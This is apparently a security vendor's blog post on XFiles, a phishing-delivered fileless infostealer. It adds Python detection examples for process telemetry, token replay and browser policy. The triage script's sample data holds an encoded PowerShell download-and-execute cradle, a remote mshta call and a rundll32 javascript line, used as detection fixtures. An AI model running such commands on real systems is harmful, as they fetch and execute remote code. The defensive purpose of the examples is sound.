
XFiles: A Fileless Malware Delivered via Phishing Campaigns

Learn how XFiles uses fileless malware, Cloudflare Turnstile widgets, and phishing emails to steal login details, cryptocurrency wallets, and access to corporate systems.
April 2, 2025

No files, no installs, no alerts. Just a single click on the wrong link is all it takes to unlock access to your inbox, your files, and your entire cloud workspace.

In a recent discovery on a cybercrime forum, Abnormal Security researchers identified a new malware strain called XFiles, a fileless toolkit designed to compromise both individual and corporate environments.

Delivered via phishing emails, XFiles uses a malicious link or HTML attachment to send targets to an attacker-controlled landing page that executes the fileless payload. Even more nefarious? The landing page includes a Cloudflare Turnstile, a legitimate verification widget repurposed as a social engineering tool to create a false sense of trust.

This discovery underscores a troubling trend: threat actors are getting more creative, making attack detection more difficult by the day.

Fileless Malware in Action: How XFiles Evades Detection

Unlike traditional malware, fileless malware doesn’t rely on dropping an executable to infect a system. Instead, it runs in memory, often abusing legitimate system tools and processes (script hosts, system utilities, the browser itself) to deliver and execute its payload. Because nothing is written to disk as a conventional executable, file-based and signature-based scanners have nothing to inspect. It is not traceless, though: the process that hosted the payload, its command line, its network connections, and its memory contents are still observable, which is why detection has to shift from scanning files to watching behavior.

XFiles is a prime example of this category. Because its payload runs in memory rather than being dropped as an executable, it leaves a much smaller forensic footprint and has a far better chance of remaining undetected.
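The behavioral telemetry mentioned above is what endpoint detection works from. The following is an added example written for this article (not code from the article or from the XFiles toolkit): it triages constructed process-creation records, shaped like Sysmon Event ID 1 or EDR telemetry, for generic living-off-the-land patterns such as encoded PowerShell, a download-and-execute cradle, a remote HTA, and a script host spawned directly by a browser. The rules are generic fileless-execution heuristics, not XFiles-specific indicators, and the hostnames use the reserved .invalid TLD.

```python
"""Heuristic triage of process-creation telemetry for fileless execution.

Added example for this article; not code from the article or from the
XFiles toolkit.  SAMPLE_EVENTS is constructed to resemble Sysmon Event ID 1 /
EDR process-creation records.  The rules are generic living-off-the-land
patterns, not XFiles-specific indicators.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I)
EXEC_SINK = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
NETWORK_FETCH = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b", re.I)
REMOTE_HTA = re.compile(r"mshta(?:\.exe)?\s+(?:https?://|javascript:|vbscript:)", re.I)
RUNDLL_SCRIPT = re.compile(r"rundll32(?:\.exe)?\s+(?:javascript|vbscript):", re.I)
REGSVR_REMOTE = re.compile(r"regsvr32(?:\.exe)?\s.*?/i:https?://", re.I)


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the list of rule names the event trips (empty for benign events)."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    reasons = []

    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded_command")
        cmd = f"{cmd} {decoded}"  # run the remaining rules over the decoded script as well

    if image in {"powershell.exe", "pwsh.exe"}:
        if HIDDEN_WINDOW.search(cmd):
            reasons.append("hidden_window")
        if EXEC_SINK.search(cmd) and NETWORK_FETCH.search(cmd):
            reasons.append("download_cradle")  # fetch, then execute, without touching disk
    if REMOTE_HTA.search(cmd):
        reasons.append("remote_hta")
    if RUNDLL_SCRIPT.search(cmd):
        reasons.append("rundll32_script")
    if REGSVR_REMOTE.search(cmd):
        reasons.append("regsvr32_remote_scriptlet")
    if parent in BROWSERS and image in SCRIPT_HOSTS:
        reasons.append("browser_spawned_script_host")  # the landing-page -> payload step
    return reasons


def triage(events):
    """Map pid -> reasons for every event that trips at least one rule."""
    findings = {}
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            findings[event["pid"]] = reasons
    return findings


# Constructed sample telemetry.  The encoded command is built here so the
# base64 is exact; hostnames use the reserved .invalid TLD.
CRADLE_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/p")'
ENCODED_CRADLE = base64.b64encode(CRADLE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"pid": 1001, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\a\notes.txt"},
    {"pid": 1002, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 1003, "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"},
    {"pid": 1004, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://example.invalid/verify.hta"},
    {"pid": 1005, "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write()'},
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

The two benign records (a user opening Notepad, an administrator running a script file from cmd.exe) produce no findings; the three others are flagged. Decoding the `-EncodedCommand` argument before applying the rules matters: the cradle is invisible in the raw command line and only shows up once the UTF-16LE base64 is unwrapped.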

The malware is capable of exfiltrating data from more than 50 popular platforms, including corporate collaboration tools like Slack and Discord, as well as productivity solutions like Google Workspace. XFiles has also been optimized to target cryptocurrency wallets, with support for over 800 wallet types, enabling attackers to harvest private keys and seed phrases.

What makes XFiles especially dangerous is its ability to steal and replay Google account tokens, the session tokens a signed-in browser holds, allowing attackers to impersonate users and access services like Gmail, Google Drive, and other cloud platforms. This poses a serious risk to businesses that rely on Google Workspace for real-time collaboration, productivity, and centralized document management.

Because a token represents a session that has already passed authentication, replaying it lets attackers bypass multi-factor authentication (MFA): the MFA check happened when the legitimate user logged in, and it is not repeated for the stolen token. That gives unauthorized access to sensitive corporate accounts, potentially exposing communications, internal documents, shared drives, calendars, and other critical assets.
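Because the server cannot tell a replayed token from the original, the tell is in how the token is used rather than in the token itself. The following is an added example written for this article (not code from the article, Abnormal, or Google): it runs over a constructed access log in which each record carries a session identifier, and flags any session that is used from a second client after MFA was completed at login. The window, the log shape, and the three users are all assumptions made for illustration.

```python
"""Detect replay of a stolen session token in web-application access logs.

Added example for this article; not code from the article, Abnormal or Google.
SAMPLE_EVENTS is constructed: each record is keyed by a session identifier
(real logs would carry a hash of the cookie) and the login record notes that
MFA was completed.  Nothing after login re-checks MFA, which is exactly why a
copied token works for the attacker; the heuristics therefore look for one
token being used from more than one client.
"""
from collections import defaultdict
from datetime import datetime, timedelta

CHROME_WIN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/134.0 Safari/537.36"
SAFARI_IOS = "Mozilla/5.0 (iPhone; CPU iPhone OS 18_3 like Mac OS X) Safari/605.1.15"

SAMPLE_EVENTS = [  # constructed; addresses are from the RFC 5737 documentation ranges
    # alice: token copied by an infostealer and replayed from a script minutes later
    {"ts": "2025-04-01T09:00:00", "session": "s1", "user": "alice", "ip": "203.0.113.10",
     "ua": CHROME_WIN, "event": "login", "mfa": True},
    {"ts": "2025-04-01T09:05:00", "session": "s1", "user": "alice", "ip": "203.0.113.10",
     "ua": CHROME_WIN, "event": "request", "path": "/mail"},
    {"ts": "2025-04-01T09:12:00", "session": "s1", "user": "alice", "ip": "198.51.100.77",
     "ua": "python-requests/2.32", "event": "request", "path": "/drive/export"},
    {"ts": "2025-04-01T09:13:00", "session": "s1", "user": "alice", "ip": "203.0.113.10",
     "ua": CHROME_WIN, "event": "request", "path": "/calendar"},
    # bob: one client throughout
    {"ts": "2025-04-01T09:30:00", "session": "s2", "user": "bob", "ip": "203.0.113.22",
     "ua": CHROME_WIN, "event": "login", "mfa": True},
    {"ts": "2025-04-01T09:45:00", "session": "s2", "user": "bob", "ip": "203.0.113.22",
     "ua": CHROME_WIN, "event": "request", "path": "/mail"},
    # carol: same phone, network moves from office Wi-Fi to mobile hours later
    {"ts": "2025-04-01T10:00:00", "session": "s3", "user": "carol", "ip": "203.0.113.40",
     "ua": SAFARI_IOS, "event": "login", "mfa": True},
    {"ts": "2025-04-01T10:02:00", "session": "s3", "user": "carol", "ip": "203.0.113.40",
     "ua": SAFARI_IOS, "event": "request", "path": "/mail"},
    {"ts": "2025-04-01T12:30:00", "session": "s3", "user": "carol", "ip": "192.0.2.5",
     "ua": SAFARI_IOS, "event": "request", "path": "/mail"},
]


def analyze_sessions(events, window=timedelta(minutes=10)):
    """Map session id -> set of anomalies for sessions used by more than one client.

    A client is the (ip, user_agent) pair seen at login.  A different pair later
    in the same session is suspicious on its own; another client being active
    within `window` of it means two parties hold the token at the same time,
    which ordinary roaming between networks does not produce.
    """
    by_session = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_session[e["session"]].append(e)

    findings = {}
    for sid, evs in by_session.items():
        login = next((e for e in evs if e["event"] == "login"), None)
        if login is None:
            continue  # no issuance record, so the original client is unknown
        origin = (login["ip"], login["ua"])
        anomalies = set()
        last_seen = {}  # client -> most recent timestamp
        for e in evs:
            ts = datetime.fromisoformat(e["ts"])
            client = (e["ip"], e["ua"])
            if client != origin:
                if e["ip"] != origin[0] and e["ua"] != origin[1]:
                    anomalies.add("new_client")
                elif e["ip"] != origin[0]:
                    anomalies.add("ip_changed")
                else:
                    anomalies.add("user_agent_changed")
            # any other client active within the window => simultaneous token holders
            for other, seen in last_seen.items():
                if other != client and ts - seen <= window:
                    anomalies.add("concurrent_clients")
            last_seen[client] = ts
        if anomalies:
            findings[sid] = anomalies
    return findings


if __name__ == "__main__":
    for sid, anomalies in analyze_sessions(SAMPLE_EVENTS).items():
        print(sid, sorted(anomalies))
```

alice's session is flagged as both a new client and concurrent use, bob's is clean, and carol's network change alone is reported as a lower-confidence `ip_changed`. Detection of this kind only shortens the attacker's window; the preventive counterpart is to bind tokens to the issuing device where the platform supports it, keep them short-lived, and require fresh authentication for sensitive actions such as bulk export.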

Compounding this threat, the malware is equipped with surveillance tooling, including a hidden VNC (HVNC) module. HVNC is a variant of virtual network computing (VNC) that runs in a desktop session the victim cannot see, so attackers can remotely monitor and control the system without any visible activity on the victim's screen.

The Role of Social Engineering in the XFiles Attack Chain

The attack chain begins with a phishing email, typically disguised as legitimate communication from a trusted service or business partner. These emails often contain links that redirect targets to a malicious landing page.

On the landing page, attackers use the Cloudflare Turnstile user verification widget as a social engineering tactic to create a false sense of security and legitimacy. Because Turnstile is a legitimate service associated with Cloudflare, a well-known provider of web infrastructure and security, its presence can lead targets to believe the site is safe and trustworthy. The gate has a second effect that benefits the attacker: automated URL scanners and sandboxes that cannot complete the challenge never reach the payload. Once the target completes the verification, they are presented with a “Download” button that triggers the delivery of the malware’s fileless payload.

XFiles’ credential-theft capabilities are extensive, targeting browser-stored passwords and cookies, corporate and personal collaboration tools, and even desktop authenticator applications in order to capture MFA one-time passwords (OTPs).

For businesses, compromised collaboration tools like Slack and Discord present significant risks. Attackers can use these platforms to impersonate employees, launch additional malware attacks, and steal important data.

How to Defend Against Fileless Malware Like XFiles

Staying ahead of threats like XFiles requires more than basic security. These strategies can help close the gaps:

  • Disable browser-based credential storage wherever possible. Storing passwords in browsers increases the risk of credential theft, especially from malware designed to extract stored data. Encourage employees to use enterprise-grade password managers instead.

  • Use hardware wallets for crypto assets. For individuals and organizations managing cryptocurrency, storing private keys offline in hardware wallets significantly reduces the risk of theft via malware-based attacks.

  • Restrict access to collaboration tools and cloud services. Regularly audit permissions to ensure that only authorized users can access sensitive systems and data, minimizing the impact of any potential compromise.

  • Train employees to spot and report phishing attempts. Ongoing security awareness training empowers employees to serve as an early warning system. Teaching users how to identify suspicious emails can stop attacks before they escalate.

  • Deploy endpoint protection to detect fileless malware. Implement endpoint detection and response (EDR) solutions, such as those from CrowdStrike, that watch process behavior rather than files: script hosts launched by a browser or mail client, encoded or hidden-window command lines, code executing from memory, and unusual outbound connections. EDR can then contain the attack at the device level.

  • Invest in an advanced email security platform. As the first line of defense, email security plays a critical role in preventing attacks from ever reaching users. Innovative solutions leverage AI to detect and block emails with malicious links or attachments before employees can engage.

When layered together, these security measures create a strong foundation to help limit exposure and reduce the likelihood of a successful compromise.
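The first bullet above, disabling browser credential storage, is enforced through managed browser policy rather than user settings. The following is an added example written for this article (not code from the article): it audits a Chromium-based browser's managed policy document for the credential-related keys and shows the weak and hardened versions side by side. The policy names are the real Chrome and Microsoft Edge enterprise policies; the two policy documents are constructed, and the deployment locations named in the comments are the ones I know for Chrome on Linux and Windows.

```python
"""Audit a Chromium-based browser's managed policy for credential-storage settings.

Added example for this article; not code from the article.  The policy keys
are real Chrome / Microsoft Edge enterprise policies.  WEAK_POLICY and
HARDENED_POLICY are constructed documents: the weak one is silent on
credentials, so each setting takes its permissive default.
"""
import json

REQUIRED = {
    "PasswordManagerEnabled": False,     # no saved passwords for an infostealer to dump
    "AutofillCreditCardEnabled": False,  # same for payment cards
    "SyncDisabled": True,                # do not replicate local data into the cloud profile
}

# Constructed: a managed policy that says nothing about credentials.
WEAK_POLICY = json.dumps({"HomepageLocation": "https://intranet.example"})

# Constructed: the same policy with the credential settings pinned.
HARDENED_POLICY = json.dumps({"HomepageLocation": "https://intranet.example", **REQUIRED})


def audit_policy(policy_json, required=REQUIRED):
    """Return a list of findings; an empty list means every required key is set correctly."""
    policy = json.loads(policy_json)
    findings = []
    for key, expected in required.items():
        if key not in policy:
            findings.append(f"{key} is not set; the browser falls back to its permissive default")
        elif policy[key] != expected:
            findings.append(f"{key} is {policy[key]!r}, expected {expected!r}")
    return findings


def harden(policy_json, required=REQUIRED):
    """Return the policy JSON with every required key forced to its expected value."""
    policy = json.loads(policy_json)
    policy.update(required)
    return json.dumps(policy, indent=2, sort_keys=True)


if __name__ == "__main__":
    # Chrome on Linux reads managed policy from /etc/opt/chrome/policies/managed/*.json;
    # on Windows the same keys live under HKLM\SOFTWARE\Policies\Google\Chrome.
    print("weak:", audit_policy(WEAK_POLICY))
    print("hardened:", audit_policy(HARDENED_POLICY))
    print(harden(WEAK_POLICY))
```

Pinning `PasswordManagerEnabled` to false stops new credentials from being saved but does not remove passwords already stored in existing profiles; those still need to be cleared or migrated to the enterprise password manager the bullet recommends.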

Outsmarting Fileless Malware with Behavioral AI

The stealth of fileless malware, and the absence of on-disk artifacts to find and quarantine, make it harder to detect and investigate, and therefore increasingly attractive to cybercriminals, especially those targeting cloud environments. The emergence of threats like XFiles reinforces just how critical it is to have advanced email security, especially as attackers grow more sophisticated in their techniques.

Abnormal Security’s AI-native platform is purpose-built to detect and stop even the most elusive threats, including fileless malware delivered via phishing emails. By analyzing thousands of behavioral signals across every message, Abnormal prevents attacks before they ever reach employees—keeping your organization protected from today’s most advanced email threats.

See for yourself how Abnormal AI provides comprehensive email protection against attacks that exploit human behavior. Schedule a demo today.

